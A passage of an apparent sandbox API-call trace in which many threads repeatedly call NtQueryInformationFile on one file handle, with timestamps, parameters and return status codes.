(in: FileHandle=0x194, IoStatusBlock=0x36dfaf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfaf8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1503 os_tid = 0xe8 [0164.801] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa78, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1504 os_tid = 0xec [0164.803] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f9f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f9f8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1505 os_tid = 0x9d8 [0164.805] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f900, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1506 os_tid = 0x898 [0164.806] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc68, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1507 os_tid = 0x48c [0164.809] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc28, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1508 os_tid = 0x6a4 [0164.810] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe90, FileInformation=0x210e20) returned 0x0 Thread: id = 1509 os_tid = 0x20c [0164.813] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fdc0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1510 os_tid = 0x630 [0164.815] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb08, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1511 os_tid = 0x5e4 [0164.817] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe28, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1512 os_tid = 0xb28 [0164.819] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff70, FileInformation=0x210e20) returned 0x0 Thread: id = 1513 os_tid = 0xb20 [0164.821] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffae0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffae0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1514 os_tid = 0x704 [0164.823] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfec8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfec8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1515 os_tid = 0x568 [0164.825] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1516 os_tid = 0x5ac [0164.827] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1517 os_tid = 0x908 [0164.829] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd10, FileInformation=0x210e20) returned 0x0 Thread: id = 1518 os_tid = 0x888 [0164.831] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7c0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1519 os_tid = 0x544 [0164.833] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fab0, FileInformation=0x210e20) returned 0x0 Thread: id = 1520 os_tid = 0x76c [0164.835] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd18, FileInformation=0x210e20) returned 0x0 Thread: id = 1521 os_tid = 0xa9c [0164.837] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1522 os_tid = 0x114 [0164.839] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff928, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff928, FileInformation=0x210e20) returned 0x0 Thread: id = 1523 os_tid = 0x5b8 [0164.847] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f968, FileInformation=0x210e20) returned 0x0 Thread: id = 1524 os_tid = 0x814 [0164.849] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff50, FileInformation=0x210e20) returned 0x0 Thread: id = 1525 os_tid = 0x834 [0164.851] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe88, FileInformation=0x210e20) returned 0x0 Thread: id = 1526 os_tid = 0x884 [0164.853] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa98, FileInformation=0x210e20) returned 0x0 Thread: id = 1527 os_tid = 0x5d4 [0164.855] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df868, FileInformation=0x210e20) returned 0x0 Thread: id = 1528 os_tid = 0x340 [0164.857] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1529 os_tid = 0x810 [0164.869] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc90, FileInformation=0x210e20) returned 0x0 Thread: id = 1530 os_tid = 0x830 [0164.879] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f920, FileInformation=0x210e20) returned 0x0 Thread: id = 1531 os_tid = 0x880 [0164.881] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfae8, FileInformation=0x210e20) returned 0x0 Thread: id = 1532 os_tid = 0xae4 [0164.883] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd08, FileInformation=0x210e20) returned 0x0 Thread: id = 1533 os_tid = 0x570 [0164.885] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffdc0, FileInformation=0x210e20) returned 0x0 Thread: id = 1534 os_tid = 0xb40 [0164.887] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fcf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fcf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1535 os_tid = 0x5f4 [0164.889] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1536 os_tid = 0xbb8 [0164.891] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1537 os_tid = 0x598 [0164.893] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1538 os_tid = 0x4e4 [0164.904] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1539 os_tid = 0xbfc [0164.907] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1540 os_tid = 0x80c [0164.909] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1541 os_tid = 0xbf8 [0164.911] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc88, FileInformation=0x210e20) returned 0x0 Thread: id = 1542 os_tid = 0x524 [0164.913] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1543 os_tid = 0x674 [0164.915] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff28, FileInformation=0x210e20) returned 0x0 Thread: id = 1544 os_tid = 0x4a0 [0164.921] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe28, FileInformation=0x210e20) returned 0x0 Thread: id = 1545 os_tid = 0x5d8 [0164.923] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1546 os_tid = 0x69c [0164.925] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd88, FileInformation=0x210e20) returned 0x0 Thread: id = 1547 os_tid = 0x6a8 [0164.927] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f858, FileInformation=0x210e20) returned 0x0 Thread: id = 1548 os_tid = 0x500 [0164.929] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe48, FileInformation=0x210e20) returned 0x0 Thread: id = 1549 os_tid = 0x4e0 [0164.931] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff48, FileInformation=0x210e20) returned 0x0 Thread: id = 1550 os_tid = 0x330 [0164.933] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1551 os_tid = 0xa30 [0164.934] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff9a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1552 os_tid = 0xb50 [0164.936] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd80, FileInformation=0x210e20) returned 0x0 Thread: id = 1553 os_tid = 0xb70 [0164.938] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 1554 os_tid = 0xb6c [0164.940] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff20, FileInformation=0x210e20) returned 0x0 Thread: id = 1555 os_tid = 0xb74 [0164.942] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa50, FileInformation=0x210e20) returned 0x0 Thread: id = 1556 os_tid = 0xb68 [0164.944] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f9a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1557 os_tid = 0x758 [0164.946] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fb68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fb68, FileInformation=0x210e20) returned 0x0 Thread: id = 1558 os_tid = 0x3d4 [0164.949] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd50, FileInformation=0x210e20) returned 0x0 Thread: id = 1559 os_tid = 0x484 [0164.951] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f8a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1560 os_tid = 0xb4c [0164.953] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf878, FileInformation=0x210e20) returned 0x0 Thread: id = 1561 os_tid = 0xa1c [0164.955] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f880, FileInformation=0x210e20) returned 0x0 Thread: id = 1562 os_tid = 0x2ac [0164.957] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf800, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf800, FileInformation=0x210e20) returned 0x0 Thread: id = 1563 os_tid = 0xa8c [0164.960] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe28, FileInformation=0x210e20) returned 0x0 Thread: id = 1564 os_tid = 0x68c [0164.962] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1565 os_tid = 0x388 [0164.964] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff20, FileInformation=0x210e20) returned 0x0 Thread: id = 1566 os_tid = 0xa50 [0164.966] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fef8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fef8, FileInformation=0x210e20) returned 0x0 Thread: id = 1567 os_tid = 0x75c [0164.968] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf9e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1568 os_tid = 0x240 [0164.970] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365faa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365faa0, FileInformation=0x210e20) returned 0x0 Thread: id = 1569 os_tid = 0x320 [0164.972] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa40, FileInformation=0x210e20) returned 0x0 Thread: id = 1570 os_tid = 0x3b4 [0164.974] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff10, FileInformation=0x210e20) returned 0x0 Thread: id = 1571 os_tid = 0x760 [0164.975] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa90, FileInformation=0x210e20) returned 0x0 Thread: id = 1572 os_tid = 0xb00 [0164.977] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1573 os_tid = 0x7fc [0164.979] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe60, FileInformation=0x210e20) returned 0x0 Thread: id = 1574 os_tid = 0xb18 [0164.981] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1575 os_tid = 0xa68 [0164.983] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1576 os_tid = 0x224 [0164.986] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd38, FileInformation=0x210e20) returned 0x0 Thread: id = 1577 os_tid = 0x2c4 [0164.988] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff18, FileInformation=0x210e20) returned 0x0 Thread: id = 1578 os_tid = 0x24c [0164.990] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f998, FileInformation=0x210e20) returned 0x0 Thread: id = 1579 os_tid = 0x4e8 [0164.992] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa58, FileInformation=0x210e20) returned 0x0 Thread: id = 1580 os_tid = 0x220 [0164.994] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df888, FileInformation=0x210e20) returned 0x0 Thread: id = 1581 os_tid = 0xb04 [0164.997] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f938, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f938, FileInformation=0x210e20) returned 0x0 Thread: id = 1582 os_tid = 0x180 [0164.999] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1583 os_tid = 0x53c [0165.001] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc08, FileInformation=0x210e20) returned 0x0 Thread: id = 1584 os_tid = 0x5b4 [0165.003] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1585 os_tid = 0x614 [0165.005] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fbf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fbf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1586 os_tid = 0x690 [0165.007] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df828, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df828, FileInformation=0x210e20) returned 0x0 Thread: id = 1587 os_tid = 0x440 [0165.010] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fcd0, FileInformation=0x210e20) returned 0x0 Thread: id = 1588 os_tid = 0x7d8 [0165.012] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f920, FileInformation=0x210e20) returned 0x0 Thread: id = 1589 os_tid = 0xa60 [0165.014] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 1590 os_tid = 0xb24 [0165.016] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fba0, FileInformation=0x210e20) returned 0x0 Thread: id = 1591 os_tid = 0x878 [0165.018] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f830, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f830, FileInformation=0x210e20) returned 0x0 Thread: id = 1592 os_tid = 0xb1c [0165.021] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe38, FileInformation=0x210e20) returned 0x0 Thread: id = 1593 os_tid = 0xb08 [0165.022] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 1594 os_tid = 0x4fc [0165.025] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f808, FileInformation=0x210e20) returned 0x0 Thread: id = 1595 os_tid = 0x4dc [0165.027] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1596 os_tid = 0x43c [0165.029] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa90, FileInformation=0x210e20) returned 0x0 Thread: id = 1597 os_tid = 0x1c4 [0165.031] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1598 os_tid = 0xbec [0165.033] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f898, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f898, FileInformation=0x210e20) returned 0x0 Thread: id = 1599 os_tid = 0xb48 [0165.035] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff40, FileInformation=0x210e20) returned 0x0 Thread: id = 1600 os_tid = 0x5bc [0165.037] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fef0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fef0, FileInformation=0x210e20) returned 0x0 Thread: id = 1601 os_tid = 0x6b8 [0165.045] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f980, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f980, FileInformation=0x210e20) returned 0x0 Thread: id = 1602 os_tid = 0x2dc [0165.047] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1603 os_tid = 0x158 [0165.050] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc60, FileInformation=0x210e20) returned 0x0 Thread: id = 1604 os_tid = 0x6cc [0165.052] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 1605 os_tid = 0x694 [0165.054] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff60, FileInformation=0x210e20) returned 0x0 Thread: id = 1606 os_tid = 0x6d8 [0165.056] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfae0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfae0, FileInformation=0x210e20) returned 0x0 Thread: id = 1607 os_tid = 0x87c [0165.058] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc90, FileInformation=0x210e20) returned 0x0 Thread: id = 1608 os_tid = 0xb88 [0165.060] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f818, FileInformation=0x210e20) returned 0x0 Thread: id = 1609 os_tid = 0xb8c [0165.062] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffbb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffbb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1610 os_tid = 0x700 [0165.064] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa60, FileInformation=0x210e20) returned 0x0 Thread: id = 1611 os_tid = 0x6f0 [0165.066] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: 